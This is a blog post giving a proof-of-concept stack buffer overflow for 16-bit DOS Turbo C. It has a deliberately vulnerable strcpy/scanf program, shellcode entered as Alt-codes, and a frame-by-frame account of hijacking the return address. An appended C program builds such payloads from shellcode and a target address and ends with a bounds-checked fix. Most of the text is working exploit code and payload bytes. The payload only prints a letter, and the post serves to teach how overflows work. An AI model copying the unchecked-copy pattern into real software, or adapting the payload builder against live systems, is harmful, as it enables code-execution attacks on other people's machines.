Wednesday, November 16, 2005

buffer overflow exploit, proof of concept

/*
My own buffer overflow exploit, proof of concept.

Also a demonstration of how even a data-entry operator can hack a system just by
typing bytes with the keyboard's Alt-numeric input: no compiler, no file, just the
"last name" field.

Michael Buen
*/


#include "stdio.h"
#include "string.h"   /* strcpy, strupr (Borland extension) */
#include "conio.h"    /* clrscr (Borland extension) */

char y;


/* Vulnerable function: copies the caller's string into an 8-byte local with
   no length check, so anything longer than 7 bytes plus the NUL overwrites the
   saved BP and the return address that sit just above d on the stack. */
void something(char *s)
{
char d[8];
strcpy(d,s);              /* unbounded copy: this is the overflow */

strupr(d);                /* uppercases up to the NUL, i.e. past the end of d as well */

printf("Your name %s will be saved to database", d);

}


/* Unused apart from having its address printed; handy as a known code address
   when comparing with the stack and data addresses below. */
void x()
{
clrscr();
puts("Hey");
}

int main(void)
{
char s[100];

clrscr();
printf("%p",x);           /* code address, for orientation */
getchar();



/*printf("\nss: %p", s);
printf("\ncs: %p", main);
printf("\nds: %p", &y); */

/* Same payload as the Alt-codes below, if you would rather hard-code it: */
/* strcpy(s, "\xb4\x02\xb2\x4d\xcd\x21\xb4\x4c\xcd\x21\x7A\xFF"); */

printf("Please input your lastname: ");
scanf("%s", s);           /* no width limit: reads as many bytes as you type */


something(s);

return 0;
}

/*

Instead of typing your last name at the scanf prompt, enter the bytes below one
at a time by holding down Alt and typing the decimal value on the numeric keypad
(DOS Alt-input inserts the byte with that value).


The program will then display the letter M.



180
2
178
77
205
33
180
76
205
33
122
255


Corresponding assembly code (the first ten bytes):

MOV AH, 02      ; DOS function 02h: write the character in DL to stdout
MOV DL, 4D      ; 'M'
INT 21
MOV AH, 4C      ; DOS function 4Ch: terminate process
INT 21


122 and 255 are 7A and FF in hexadecimal; read as a little-endian word that is
FF7A, the address of variable s in the stack (the commented-out printf of s above
shows it on your machine). In the Tiny model code, data and stack share one 64K
segment, so CS = DS = SS, a near return address is a single 16-bit offset, and an
offset into the stack is just as executable as one into the code.

The twelve bytes land like this in something()'s frame: the first 8 fill d, the
next 2 (CD 21) overwrite the saved BP, and the last 2 (7A FF) overwrite the return
address. When something() returns, execution resumes at FF7A, i.e. in the copy of
the input still sitting in s in main()'s frame, and runs the code entered above.
From there you can execute any arbitrary code of your choice; the example above
just calls interrupt 21 function 02 to display the letter M and then exits cleanly.

Caveat when reproducing this: strupr(d) keeps going until the terminating NUL, so
it also processes the overflowed bytes, and 7A is ASCII 'z', which strupr turns
into 5A. Verify the return-address bytes after that call (single-stepping in Turbo
Debugger is the easiest way); the jump only lands on the payload if the address
reaches the stack unchanged, so an address containing a byte in the range 61-7A
needs a different landing spot.


Compile this in Turbo C, memory model Tiny.

*/
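To make the payload layout and the input-path caveat concrete, here is an added example (my own code, not part of the original post) that builds the twelve-byte payload from the post's shellcode and a target address, counts the bytes that scanf("%s") or strupr() would alter on the way in, and shows a bounds-checked replacement for something(). The frame layout (8-byte buffer, 2-byte saved BP, 2-byte near return address) is taken from the post; the NOP padding, the function names and the 0xFF7A target are assumptions for illustration, and the hardened copy uses toupper() instead of the Borland strupr() so it compiles on any C compiler.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout of something() in Turbo C, Tiny model (from the post):
 * d[8] at BP-8, saved BP at BP, 16-bit return address at BP+2. */
#define D_SIZE      8
#define SAVED_BP    2
#define RET_OFFSET  (D_SIZE + SAVED_BP)   /* 10 bytes sit below the return address */
#define PAYLOAD_MAX (RET_OFFSET + 2)

/* The post's DOS shellcode: MOV AH,02 / MOV DL,'M' / INT 21h / MOV AH,4Ch / INT 21h */
static const uint8_t shellcode[] = {
    0xB4, 0x02, 0xB2, 0x4D, 0xCD, 0x21, 0xB4, 0x4C, 0xCD, 0x21
};

/* Lay out the shellcode, NOP padding (assumed filler) up to the return-address
 * slot, then the little-endian target address. Returns the payload length, or
 * -1 if the code does not fit below the return address or out is too small. */
int build_payload(const uint8_t *code, size_t code_len, uint16_t ret_addr,
                  uint8_t *out, size_t out_size)
{
    if (code_len > RET_OFFSET || out_size < PAYLOAD_MAX)
        return -1;
    memcpy(out, code, code_len);
    memset(out + code_len, 0x90, RET_OFFSET - code_len);  /* 0x90 = NOP */
    out[RET_OFFSET]     = (uint8_t)(ret_addr & 0xFF);      /* low byte first */
    out[RET_OFFSET + 1] = (uint8_t)(ret_addr >> 8);
    return PAYLOAD_MAX;
}

/* Count bytes the input path mangles: NUL or whitespace ends scanf("%s"), and
 * strupr() rewrites 'a'..'z' all the way to the terminator, i.e. past d[]. */
int count_bad_bytes(const uint8_t *p, size_t len)
{
    int bad = 0;
    for (size_t i = 0; i < len; i++) {
        if (p[i] == 0 || isspace(p[i]) || (p[i] >= 'a' && p[i] <= 'z'))
            bad++;
    }
    return bad;
}

/* Hardened counterpart of something(): reject input that does not fit instead
 * of copying it. Returns the copied length, or -1 when rejected. */
int safe_something(const char *s, char *dst, size_t dst_size)
{
    size_t n = strlen(s);
    if (n >= dst_size)
        return -1;
    memcpy(dst, s, n + 1);
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)toupper((unsigned char)dst[i]);
    return (int)n;
}

/* Print the payload as the decimal Alt codes you would type at the prompt. */
void print_alt_codes(const uint8_t *p, int len)
{
    for (int i = 0; i < len; i++)
        printf("%d\n", p[i]);
}

int main(void)
{
    uint8_t payload[PAYLOAD_MAX];
    char input[PAYLOAD_MAX + 1], name[D_SIZE];
    int len = build_payload(shellcode, sizeof shellcode, 0xFF7A, payload, sizeof payload);
    if (len < 0)
        return 1;
    print_alt_codes(payload, len);
    printf("bytes scanf/strupr would alter: %d\n", count_bad_bytes(payload, (size_t)len));
    memcpy(input, payload, (size_t)len);
    input[len] = '\0';
    printf("safe_something on the payload: %d\n", safe_something(input, name, sizeof name));
    printf("safe_something on \"buen\": %d -> %s\n",
           safe_something("buen", name, sizeof name), name);
    return 0;
}
```

With the post's bytes and 0xFF7A the builder reproduces the twelve Alt codes exactly, and the bad-byte count is 1: the 0x7A ('z') in the return address, which strupr() will rewrite. The hardened copy refuses the payload outright rather than truncating it, since a silently truncated "last name" is still a data-integrity bug even when it is no longer a control-flow one.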
